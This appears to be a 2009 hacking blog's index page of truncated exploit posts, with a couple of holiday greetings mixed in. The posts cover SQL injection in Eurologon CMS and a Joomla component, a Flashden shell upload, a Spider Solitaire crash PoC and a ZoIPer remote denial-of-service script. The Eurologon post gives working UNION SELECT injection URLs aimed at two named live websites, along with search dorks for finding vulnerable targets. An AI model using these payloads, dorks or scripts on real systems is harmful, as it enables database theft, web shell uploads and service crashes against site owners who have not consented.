Wednesday, December 23, 2009

merry christmas 2009 and happy new year 2010

Praying the blessings of the season will refresh you this Christmas and throughout the coming y...

Monday, December 14, 2009

Eurologon CMS SQL Injection Vuln

Software : Eurologon Content Management System
Vendor : http://www.content-manager.it/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
[o] Vulnerable file
links.php
[o] Exploit
http://localhost/[path]/links.php?id=[SQL]
[o] Proof of concept
http://www.ream.it/links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/*
http://www.fondazionefabretti.it/links.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14/*
[o] Dork
"Powered by Eurologon"
[o] Notes
this is a private scri...

Saturday, November 28, 2009

Joomla Component com_lyftenbloggie Remote SQL injection vulnerability

###############################################################################################
#### Joomla Component com_lyftenbloggie Remote SQL injection vulnerability - (author) ####
#### Author : kaMtiEz (kamzcrew[at]yahoo[dot]com) ####
#### Homepage : http://www.indonesiancoder.com ####
#### Date : November 11, 2009 ####
###############################################################################################
[ Software Information ]
[+] Vendor : http://www.lyften.com/
[+] Download : http://www.lyften.com/products/lyftenbloggie/download/id-10.html
[+]...

Friday, November 27, 2009

Flashden Shell Upload Vulnerability

# Exploit Title: Flashden Shell Upload Vulnerability
# Date: 26.12.2009
# Author: DigitALL
# Greetz: Zombie KroNickq HackSpy and ALL 1923Turk.Biz Members
# Vendor: http://www.jurgenvisser.nl
# Version: 2.0
# Dork: inurl:"select_file2.php"
# Application: Please Add Files ( Your Shell ) And Upload.
# Shell: /test/shell.php -- /up/shell.php -- /upload/shell.php -- /beta/shell.php OR one back d...

Wednesday, November 25, 2009

Eid al-Adha 1428H

Happy Eid al-Adha 1428...

Thursday, October 15, 2009

Spider Solitaire local crash proof of concept exploit for Windows XP SP2.

<?php
/*
Spider Solitaire (Windows XP SP2) Local Crash PoC
By SirGod
www.insecurity.ro
www.twitter.com/SirGod
Loading a corrupt save file(spider.sav) will result in a local crash
of Spider Solitaire
*/
$username="pwn"; //Replace with your computer username
$file="spider.sav";
$junk="Spider Solitaire Local Crash";
$handle = fopen($file, 'w') or die("Can't create file");
fwrite($handle,$junk);
fclose($handle);
$file2="C:/Documents and Settings/" .$username. "/My Documents/spider.sav";
if(!copy($file,$file2))
{
 die("Can't copy file");
}
else
{
 echo "File succesfully...

ZoIPer v2.22 Call-Info Remote Denial Of Service

#!/usr/bin/python
# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars: \x20 , \x09
import sys
import socket
import os
def main(argc , argv):
    if len(sys.argv) != 2:
        os.system("cls")
        sys.exit("Usage: " + sys.argv[0] + " \n")
    target_host = sys.argv[1]
    target_port = 5060
    evil_packet = ...
    os.system("cls")
    print...
